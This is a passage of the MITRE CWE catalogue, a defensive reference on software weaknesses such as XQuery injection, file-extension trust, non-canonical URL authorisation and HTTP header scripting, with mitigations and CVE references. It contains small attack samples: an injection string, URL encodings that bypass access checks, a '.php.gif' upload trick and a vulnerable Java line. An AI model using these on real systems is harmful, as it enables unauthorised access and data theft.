- updated Description, Name, References, Relationship_Notes - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2010-06-21 - updated Enabling_Factors_for_Exploitation - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Unsafe Treatment of XPath Input - Failure to Sanitize Data within XPath Expressions (aka 'XPath injection') - Failure to Sanitize Data within XPath Expressions ('XPath injection') - - - - The application does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash. - - An attacker may be able to conduct cross-site scripting and other attacks against users who have these components enabled. - If an application does not neutralize user controlled data being placed in the header of an HTTP response coming from the server, the header may contain a script that will get executed in the client's browser context, potentially resulting in a cross site scripting vulnerability or possibly an HTTP response splitting attack. It is important to carefully control data that is being placed both in HTTP response header and in the HTTP response body to ensure that no scripting syntax is present, taking various encodings into account. - - - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Run arbitrary code. - - - Confidentiality - Read Application Data - Attackers may be able to obtain sensitive information. - - - - - Architecture and Design - Perform output validation in order to filter/escape/encode unsafe data that is being passed from the server in an HTTP response header. - - - Architecture and Design - Disable script execution functionality in the clients' browser. - - - - - In the following Java example, user-controlled data is added to the HTTP headers and returned to the client. Given that the data is not subject to neutralization, a malicious user may be able to inject dangerous scripting tags that will lead to script execution in the client browser. - - response.addHeader(HEADER_NAME, untrustedRawInputData); - - - - - - CVE-2006-3918 - Web server does not remove the Expect header from an HTTP request when it is reflected back in an error message, allowing a Flash SWF file to perform XSS attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918 - - - - - SFP24 - Tainted input to command - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Observed_Example - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Name, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples, Description, Observed_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Enabling_Factors_for_Exploitation - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - Insufficient Filtering of HTTP Headers for Scripting Syntax - Insufficient Sanitization of HTTP Headers for Scripting Syntax - Improper Sanitization of HTTP Headers for Scripting Syntax - - - - The software contains an account lockout protection mechanism, but the mechanism is too restrictive and can be triggered too easily, which allows attackers to deny service to legitimate users by causing their accounts to be locked out. - Account lockout is a security feature often present in applications as a countermeasure to the brute force attack on the password based authentication mechanism of the system. After a certain number of failed login attempts, the users' account may be disabled for a certain period of time or until it is unlocked by an administrator. Other security events may also possibly trigger account lockout. However, an attacker may use this very security feature to deny service to legitimate system users. It is therefore important to ensure that the account lockout security mechanism is not overly restrictive. - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - High - - - Availability - DoS: Resource Consumption (Other) - Users could be locked out of accounts. - - - - - Architecture and Design - Implement more intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name. - - - Architecture and Design - Implement a lockout timeout that grows as the number of incorrect login attempts goes up, eventually resulting in a complete lockout. - - - Architecture and Design - Consider alternatives to account lockout that would still be effective against password brute force attacks, such as presenting the user machine with a puzzle to solve (makes it do some computation). - - - - - A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction. - - - - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Enabling_Factors_for_Exploitation, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion. - An application might use the file name or extension of of a user-supplied file to determine the proper course of action, such as selecting the correct process to which control should be passed, deciding what data should be made available, or what resources should be allocated. If the attacker can cause the code to misclassify the supplied file, then the wrong action could occur. For example, an attacker could supply a file that ends in a ".php.gif" extension that appears to be a GIF image, but would be processed as PHP code. In extreme cases, code execution is possible, but the attacker could also cause exhaustion of resources, denial of service, exposure of debug or system data (including application source code), or being bound to a particular server side process. This weakness may be due to a vulnerability in any of the technologies used by the web and application servers, due to misconfiguration, or resultant from another flaw in the application itself. - - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - High - - - Confidentiality - Read Application Data - An attacker may be able to read sensitive data. - - - Availability - DoS: Crash, Exit, or Restart - An attacker may be able to cause a denial of service. - - - Access Control - Gain Privileges or Assume Identity - An attacker may be able to gain privileges. - - - - - Architecture and Design - Make decisions on the server side based on file content and not on file name or extension. - - - - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Observed_Example - - - CWE Content Team - MITRE - 2008-10-13 - Significant clarification of the weakness description. - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Name, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-12-13 - updated Applicable_Platforms, Common_Consequences - - - CWE Content Team - MITRE - 2011-03-29 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Enabling_Factors_for_Exploitation - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - Taking Actions based on File Name or Extension of a User Supplied File - - - - The software defines policy namespaces and makes authorization decisions based on the assumption that a URL is canonical. This can allow a non-canonical URL to bypass the authorization. - - If an application defines policy namespaces and makes authorization decisions based on the URL, but it does not require or convert to a canonical URL before making the authorization decision, then it opens the application to attack. For example, if the application only wants to allow access to http://www.example.com/mypage, then the attacker might be able to bypass this restriction using equivalent URLs such as: - - - http://WWW.EXAMPLE.COM/mypage - http://www.example.com/%6Dypage (alternate encoding) - http://192.168.1.1/mypage (IP address) - http://www.example.com/mypage/ (trailing /) - http://www.example.com:80/mypage - - - Therefore it is important to specify access control policy that is based on the path information in some canonical form with all alternate encodings rejected (which can be accomplished by a default deny rule). - - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - High - - - Access Control - Bypass Protection Mechanism - An attacker may be able to bypass the authorization mechanism to gain access to the otherwise-protected URL. - - - Confidentiality - Read Files or Directories - If a non-canonical URL is used, the server may choose to return the contents of the file, instead of pre-processing the file (e.g. as a program). - - - - - Architecture and Design - Make access control policy based on path information in canonical form. Use very restrictive regular expressions to validate that the path is in the expected form. - - - Architecture and Design - Reject all alternate path encodings that are not in the expected canonical form. - - - - - Example from CAPEC (CAPEC ID: 4, "Using Alternative IP Address Encodings"). An attacker identifies an application server that applies a security policy based on the domain and application name, so the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by putting in the IP address of the host the application authentication and authorization controls may be bypassed http://192.168.0.1:8080/application. The attacker relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions. - - - - - IDS02-J - Canonicalize path names before validating them - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Applicable_Platforms, Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - Using Non-Canonical Paths for Authorization Decisions - - - - The application does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly. - - When an application contains certain functions that perform operations requiring an elevated level of privilege, the caller of a privileged API must be careful to: - - - ensure that assumptions made by the APIs are valid, such as validity of arguments - account for known weaknesses in the design/implementation of the API - call the API from a safe context - - - If the caller of the API does not follow these requirements, then it may allow a malicious user or process to elevate their privilege, hijack the process, or steal sensitive data. - For instance, it is important to know if privileged APIs do not shed their privileges before returning to the caller or if the privileged function might make certain assumptions about the data, context or state information passed to it by the caller. It is important to always know when and how privileged APIs can be called in order to ensure that their elevated level of privilege cannot be exploited. - - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - Low - - - Access Control - Gain Privileges or Assume Identity - An attacker may be able to elevate privileges. - - - Confidentiality - Read Application Data - An attacker may be able to obtain sensitive information. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - An attacker may be able to execute code. - - - - - Implementation - Before calling privileged APIs, always ensure that the assumptions made by the privileged code hold true prior to making the call. - - - Architecture and Design - Know architecture and implementation weaknesses of the privileged APIs and make sure to account for these weaknesses before calling the privileged APIs to ensure that they can be called safely. - - - Implementation - If privileged APIs make certain assumptions about data, context or state validity that are passed by the caller, the calling code must ensure that these assumptions have been validated prior to making the call. - - - Implementation - If privileged APIs do not shed their privilege prior to returning to the calling code, then calling code needs to shed these privileges immediately and safely right after the call to the privileged APIs. In particular, the calling code needs to ensure that a privileged thread of execution will never be returned to the user or made available to user-controlled processes. - - - Implementation - Only call privileged APIs from safe, consistent and expected state. - - - Implementation - Ensure that a failure or an error will not leave a system in a state where privileges are not properly shed and privilege escalation is possible (i.e. fail securely with regards to handling of privileges). - - - - - CVE-2003-0645 - A Unix utility that displays online help files, if installed setuid, could allow a local attacker to gain privileges when a particular file-opening function is called. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0645 - - - - - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Name, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Observed_Examples - - Improper Use of Privileged APIs - - - - The software uses obfuscation or encryption of inputs that should not be mutable by an external actor, but the software does not use integrity checks to detect if those inputs have been modified. - When an application relies on obfuscation or incorrectly applied / weak encryption to protect client-controllable tokens or parameters, that may have an effect on the user state, system state, or some decision made on the server. Without protecting the tokens/parameters for integrity, the application is vulnerable to an attack where an adversary traverses the space of possible values of the said token/parameter in order to attempt to gain an advantage. The goal of the attacker is to find another admissible value that will somehow elevate their privileges in the system, disclose information or change the behavior of the system in some way beneficial to the attacker. If the application does not protect these critical tokens/parameters for integrity, it will not be able to determine that these values have been tampered with. Measures that are used to protect data for confidentiality should not be relied upon to provide the integrity service. - - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - High - - - Integrity - Unexpected State - The inputs could be modified without detection, causing the software to have unexpected system state or make incorrect security decisions. - - - - - Architecture and Design - Protect important client controllable tokens/parameters for integrity using PKI methods (i.e. digital signatures) or other means, and checks for integrity on the server side. - - - Architecture and Design - Repeated requests from a particular user that include invalid values of tokens/parameters (those that should not be changed manually by users) should result in the user account lockout. - - - Architecture and Design - Client side tokens/parameters should not be such that it would be easy/predictable to guess another valid state. - - - Architecture and Design - Obfuscation should not be relied upon. If encryption is used, it needs to be properly applied (i.e. proven algorithm and implementation, use padding, use random initialization vector, user proper encryption mode). Even with proper encryption where the ciphertext does not leak information about the plaintext or reveal its structure, compromising integrity is possible (although less likely) without the provision of the integrity service. - - - - - CVE-2005-0039 - An IPSec configuration does not perform integrity checking of the IPSec packet as the result of either not configuring ESP properly to support the integrity service or using AH improperly. In either case, the security gateway receiving the IPSec packet would not validate the integrity of the packet to ensure that it was not changed. Thus if the packets were intercepted the attacker could undetectably change some of the bits in the packets. The meaningful bit flipping was possible due to the known weaknesses in the CBC encryption mode. Since the attacker knew the structure of the packet, they were able (in one variation of the attack) to use bit flipping to change the destination IP of the packet to the destination machine controlled by the attacker. And so the destination security gateway would decrypt the packet and then forward the plaintext to the machine controlled by the attacker. The attacker could then read the original message. For instance if VPN was used with the vulnerable IPSec configuration the attacker could read the victim's e-mail. This vulnerability demonstrates the need to enforce the integrity service properly when critical data could be modified by an attacker. This problem might have also been mitigated by using an encryption mode that is not susceptible to bit flipping attacks, but the preferred mechanism to address this problem still remains message verification for integrity. While this attack focuses on the network layer and requires an entity that controls part of the communication path such as a router, the situation is not much different at the software level, where an attacker can modify tokens/parameters used by the application. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0039 - - - - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Observed_Example - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences, Description, Enabling_Factors_for_Exploitation, Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Description - - Relying on Obfuscation or Encryption with no Integrity Checking to Protect User Controllable Parameters that are Used to Determine User or System State - - - - The software, when opening a file or directory, does not sufficiently handle when the name is associated with a hard link to a target that is outside of the intended control sphere. This could allow an attacker to cause the software to operate on unauthorized files. - Failure for a system to check for hard links can result in vulnerability to different types of attacks. For example, an attacker can escalate their privileges if a file used by a privileged program is replaced with a hard link to a sensitive file (e.g. AUTOEXEC.BAT). When the process opens the file, the attacker can assume the privileges of that process, or prevent the program from accurately processing data. - - - - - - - - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Architecture and Design - Separation of Privilege - - Follow the principle of least privilege when assigning access rights to entities in a software system. - Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file. Ensure good compartmentalization in the system to provide protected areas that can be trusted. - - - - - - CVE-2002-0725 - File system allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0725 - - - CVE-2003-0844 - Web server plugin allows local users to overwrite arbitrary files via a symlink attack on predictable temporary filenames. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0844 - - - - - Windows hard link - - - FIO05-C - Identify files using multiple file attributes - - - SFP18 - Link in resource name resolution - - - - - - - Under-studied - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The server contains a protection mechanism that assumes that any URI that is accessed using HTTP GET will not cause a state change to the associated resource. This might allow attackers to bypass intended access restrictions and conduct resource modification and deletion attacks, since some applications allow GET to modify state. - The HTTP GET method and some other methods are designed to retrieve resources and not to alter the state of the application or resources on the server side. Furthermore, the HTTP specification requires that GET requests (and other requests) should not have side effects. Believing that it will be enough to prevent unintended resource alterations, an application may disallow the HTTP requests to perform DELETE, PUT and POST operations on the resource representation. However, there is nothing in the HTTP protocol itself that actually prevents the HTTP GET method from performing more than just query of the data. Developers can easily code programs that accept a HTTP GET request that do in fact create, update or delete data on the server. For instance, it is a common practice with REST based Web Services to have HTTP GET requests modifying resources on the server side. However, whenever that happens, the access control needs to be properly enforced in the application. No assumptions should be made that only HTTP DELETE, PUT, POST, and other methods have the power to alter the representation of the resource being accessed in the request. - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - High - - - Access Control - Gain Privileges or Assume Identity - An attacker could escalate privileges. - - - Integrity - Modify Application Data - An attacker could modify resources. - - - Confidentiality - Read Application Data - An attacker could obtain sensitive information. - - - - - System Configuration - Configure ACLs on the server side to ensure that proper level of access control is defined for each accessible resource representation. - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Enabling_Factors_for_Exploitation - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-03-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Description, Enabling_Factors_for_Exploitation, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The Web services architecture may require exposing a Web Service Definition Language (WSDL) file that contains information on the publicly accessible services and how callers of these services should interact with them (e.g. what parameters they expect and what types they return). - - An information exposure may occur if any of the following apply: - - - The WSDL file is accessible to a wider audience than intended. - The WSDL file contains information on the methods/services that should not be publicly accessible or information about deprecated methods. This problem is made more likely due to the WSDL often being automatically generated from the code. - Information in the WSDL file helps guess names/locations of methods/resources that should not be publicly accessible. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Confidentiality - Read Application Data - The attacker may find sensitive information located in the WSDL file. - - - - - Architecture and Design - Limit access to the WSDL file as much as possible. If services are provided only to a limited number of entities, it may be better to provide WSDL privately to each of these entities than to publish WSDL publicly. - - - Architecture and Design - Separation of Privilege - Make sure that WSDL does not describe methods that should not be publicly accessible. Make sure to protect service methods that should not be publicly accessible with access controls. - - - Architecture and Design - Do not use method names in WSDL that might help an adversary guess names of private methods/resources used by the service. - - - - - The WSDL for a service providing information on the best price of a certain item exposes the following method: float getBestPrice(String ItemID) An attacker might guess that there is a method setBestPrice (String ItemID, float Price) that is available and invoke that method to try and change the best price of a given item to their advantage. The attack may succeed if the attacker correctly guesses the name of the method, the method does not have proper access controls around it and the service itself has the functionality to update the best price of the item. - - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-09-27 - updated Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Observed_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Name, Relationships - - Information Leak through WSDL File - Information Exposure Through WSDL File - - - - The software uses external input to dynamically construct an XQuery expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query. - The net effect is that the attacker will have control over the information selected from the XML database and may use that ability to control application flow, modify logic, retrieve unauthorized data, or bypass important checks (e.g. authentication). - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Confidentiality - Read Application Data - An attacker might be able to read sensitive information from the XML database. - - - - - Implementation - Use parameterized queries. This will help ensure separation between data plane and control plane. - - - Implementation - Properly validate user input. Reject data where appropriate, filter where appropriate and escape where appropriate. Make sure input that will be used in XQL queries is safe in that context. - - - - - An attacker may pass XQuery expressions embedded in an otherwise standard XML document. The attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back. doc(accounts.xml)//user[name='*'] The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL. - - - - - 46 - XQuery Injection - - - SFP24 - Tainted input to command - - - - This weakness is similar to other weaknesses that enable injection style attacks, such as SQL injection, command injection and LDAP injection. The main difference is that the target of attack here is the XML database. - - - - Evgeny Lebanidze - Cigital - 2008-01-30 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Name, Relationship_Notes - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-02-16 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name - - - CWE Content Team - MITRE - 2010-12-13 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Unsafe Treatment of XQuery Input - Failure to Sanitize Data within XQuery Expressions (aka 'XQuery Injection') - Failure to Sanitize Data within XQuery Expressions ('XQuery Injection') - - - - The product does not properly compartmentalize or isolate functionality, processes, or resources that require different privilege levels, rights, or permissions. - When a weakness occurs in functionality that is accessible by lower-privileged users, then without strong boundaries, an attack might extend the scope of the damage to higher-privileged users. - - - - - - - Primary - - - - - - - - Separation of Privilege - Some people and publications use the term "Separation of Privilege" to describe this weakness, but this term has dual meanings in current usage. This node conflicts with the original definition of "Separation of Privilege" by Saltzer and Schroeder; that original definition is more closely associated with CWE-654. Because there are multiple interpretations, use of the "Separation of Privilege" term is discouraged. - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - - - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - The exploitation of a weakness in low-privileged areas of the software can be leveraged to reach higher-privileged areas without having to overcome any additional obstacles. - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Compare binary / bytecode to application permission manifest - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - - - Architecture and Design - Break up privileges between different modules, objects, or entities. Minimize the interfaces between modules and require strong access control between them. - - - - - Single sign-on technology is intended to make it easier for users to access multiple resources or domains without having to authenticate each time. While this is highly convenient for the user and attempts to address problems with psychological acceptability, it also means that a compromise of a user's credentials can provide immediate access to all other resources or domains. - - - The traditional UNIX privilege model provides root with arbitrary access to all resources, but root is frequently the only user that has privileges. As a result, administrative tasks require root privileges, even if those tasks are limited to a small area, such as updating user manpages. Some UNIX flavors have a "bin" user that is the owner of system executables, but since root relies on executables owned by bin, a compromise of the bin account can be leveraged for root privileges by modifying a bin-owned executable, such as CVE-2007-4238. - - - - - CVE-2019-6260 - Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC's physical address space from the host, and possibly the network [REF-1138]. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260 - - - - - - - - - There is a close association with CWE-250 (Execution with Unnecessary Privileges). CWE-653 is about providing separate components for each "privilege"; CWE-250 is about ensuring that each component has the least amount of privileges possible. In this fashion, compartmentalization becomes one mechanism for reducing privileges. - The term "Separation of Privilege" is used in several different ways in the industry, but they generally combine two closely related principles: compartmentalization (this node) and using only one factor in a security decision (CWE-654). Proper compartmentalization implicitly introduces multiple factors into a security decision, but there can be cases in which multiple factors are required for authentication or other mechanisms that do not involve compartmentalization, such as performing all required checks on a submitted certificate. It is likely that CWE-653 and CWE-654 will provoke further discussion. - - - - Pascal Meunier - Purdue University - 2008-01-18 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction 